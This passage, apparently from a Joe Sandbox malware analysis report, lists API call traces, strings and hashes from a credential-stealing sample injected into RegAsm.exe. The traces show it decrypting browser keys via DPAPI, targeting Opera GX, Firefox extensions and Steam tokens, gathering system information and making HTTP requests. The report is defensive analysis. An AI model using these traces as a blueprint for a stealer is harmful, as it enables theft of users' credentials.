                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                        • API String ID: 2929475105-1193256905
                                                                                                                                                        • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                        • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                                                        • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                        • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                        • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog3_catchlstrlen
                                                                                                                                                        • String ID: ERROR
                                                                                                                                                        • API String ID: 591506033-2861137601
                                                                                                                                                        • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                        • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                                                        • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                        • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                        • String ID: =A
                                                                                                                                                        • API String ID: 3183270410-2399317284
                                                                                                                                                        • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                        • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                                                        • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                        • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                        • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                        • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                        • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                          • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                          • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                          • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                        • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID:
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                        • String ID: nzA
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                        • String ID: ERROR$ERROR
                                                                                                                                                        • API String ID: 3086566538-2579291623
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4198075804-0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1065093856-0
                                                                                                                                                        APIs
                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C603095
                                                                                                                                                          • Part of subcall function 6C6035A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C68F688,00001000), ref: 6C6035D5
                                                                                                                                                          • Part of subcall function 6C6035A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6035E0
                                                                                                                                                          • Part of subcall function 6C6035A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6035FD
                                                                                                                                                          • Part of subcall function 6C6035A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C60363F
                                                                                                                                                          • Part of subcall function 6C6035A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C60369F
                                                                                                                                                          • Part of subcall function 6C6035A0: __aulldiv.LIBCMT ref: 6C6036E4
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C60309F
                                                                                                                                                          • Part of subcall function 6C625B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6256EE,?,00000001), ref: 6C625B85
                                                                                                                                                          • Part of subcall function 6C625B50: EnterCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625B90
                                                                                                                                                          • Part of subcall function 6C625B50: LeaveCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625BD8
                                                                                                                                                          • Part of subcall function 6C625B50: GetTickCount64.KERNEL32 ref: 6C625BE4
                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6030BE
                                                                                                                                                          • Part of subcall function 6C6030F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C603127
                                                                                                                                                          • Part of subcall function 6C6030F0: __aulldiv.LIBCMT ref: 6C603140
                                                                                                                                                          • Part of subcall function 6C63AB2A: __onexit.LIBCMT ref: 6C63AB30
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1664310425-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                        • String ID: Opera GX
                                                                                                                                                        • API String ID: 1719890681-3280151751
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-3916222277
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                        • API String ID: 502913869-3507145866
                                                                                                                                                        APIs
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                        • String ID: 1iA
                                                                                                                                                        • API String ID: 3494564517-1863120733
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
